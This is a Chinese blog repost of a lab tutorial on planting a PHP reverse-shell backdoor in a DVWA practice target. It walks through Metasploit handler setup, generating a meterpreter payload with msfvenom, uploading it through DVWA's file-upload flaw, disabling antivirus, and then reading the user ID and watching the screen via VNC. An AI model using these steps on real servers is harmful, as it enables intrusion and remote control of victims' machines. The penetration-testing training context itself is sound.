【世界快播报】PHP后门反弹演示

2023-01-14 19:18:46 来源:51CTO博客

准备

一台kali虚拟机一台 win11物理机phpstudy 开启 Nginx和Mysqlphpstudy中已经搭建好DVWA靶场DVWA靶场的安全等级调整值low

注意:


(资料图)

需要将杀毒软件个关了, 否则有提示, 黑客入侵.

开始

使用监控模块, 输入:

use exploit/multi/handler

配置payload

set payload php/meterpreter/reverse_tcp# 接着输入options

设置 lhost 和lport

这里发现 攻击机的端口不用设置了, 已经有了, 只要设置lhost 就可以了

set lhost 攻击机的ip

生成php后门执行攻击获得meterpreter

注意: 要新建端口, 在root权限下执行

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip  lport=4444 R>shell.php

这样在window11左面少就有这个文件了

上传文件

这是我原来的地址: http://dvwa/vulnerabilities/upload/#

这是我要填写的地址: http://dvwa/hackable/uploads/shell.php

出现上图几面说明: 这是正常的, 后门已经上传到了靶机上

获得权限

输入:
run # 也可以直接输入 exploit  , 都一样

也可能出现 404, 都是正常现象

只要有这两行, 就代表上传的后门生效了

成功啦

获取管理员的名字, 输入:
getuid
观看屏幕 可以在meterpreter里输入
run vnc

点开文件即可看到自己电脑的画面

标签: 直接输入 黑客入侵 可能出现

上一篇:【速看料】Linux下图片处理
下一篇:通过tcpdump抓取lldp/cdp报文判断服务器上联网络配置